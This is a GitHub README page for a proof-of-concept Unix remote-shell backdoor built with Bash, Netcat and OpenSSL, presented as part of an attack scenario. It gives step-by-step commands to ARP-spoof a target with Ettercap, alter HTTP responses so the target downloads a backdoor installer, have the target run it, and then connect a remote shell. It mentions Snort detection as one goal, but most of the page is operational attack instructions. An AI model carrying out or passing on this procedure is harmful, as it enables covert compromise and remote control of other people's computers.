Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Failed to load latest commit information.



Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)


This project is associated to another mine :

The main goals of this project is to implement an attack scenario as below :

  • Implement backdoor like remote-shell with Bash
  • Attack Man In the middle with Ettercap (like ARP Spoofing)
  • Hosting a backdoor installer
  • Automate data alteration to inject our backdoor inside the computer of target by a browser
  • If the target run (naively) the script (ie: the backdoor installer) without reading source-code the computer is infected and the attacker will obtain a remote-access command
  • Detect and prevent this kind of attack with NIDS tool as Snort

Notice :

  • The programming language was choose only for a Proof of Concept (POC)
  • The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.
  • The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.


  • openssl (tested with v1.0.1j)
  • ettercap (>= v0.8.1)
  • etterfilter (>= v0.8.1)
  • etterfilter (>= v0.8.1)
  • netcat (The compiled version is "The GNU Netcat" [not BSD release] v0.7.1)

How it work ?

The backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see "$HOST" inside "config.sh".

Simple test

git clone git@github.com:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh 
vim config.sh
HOST=192.168.0.x ./client.sh

.... And try to execute some shell command

Real condition

git clone git@github.com:pilebones/backdoorBash.git
git clone git@github.com:pilebones/etterfilterSamples.git
git clone git@github.com:pilebones/hostingBackdoorInstaller.git
cp backdoorBash/config.sh.sample backdoorBash/config.sh
vim backdoorBash/config.sh
# For export remove client.sh *.log config.sh.sample
tar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/
# Configure your vhost to hosting hostingBackdoorInstaller's project
cd etterfilterSamples/inject_backdoor_installer/
# Update Redirect URL from "fake-http-redirect.txt"
vim fake-http-redirect.txt
IFACE=wlanX IP_AP= IP_TARGET=192.168.0.x ./run
# From target try to download a shell script like "test.sh" or try with 404 Not Found page (same behavior => inject backdoor installer)
# From target : "chmod +x bd_installer.sh && ./bd_installer.sh"
HOST=192.168.0.x ./client.sh


This backdoor is writing in bash programming language => It work only on Unix OS.

Currently, tested only on :

  • Archlinux
  • Debian 7
  • Ubuntu 14.10

Warning : Some recent router/box/AP/switch prevent this kind of MiTM attack. In this case, Ettercap could relay only one-way network-packets (From target to AP but not from AP to target). So Ettercap can alter the HTTP response to redirect to the backdoor's installer.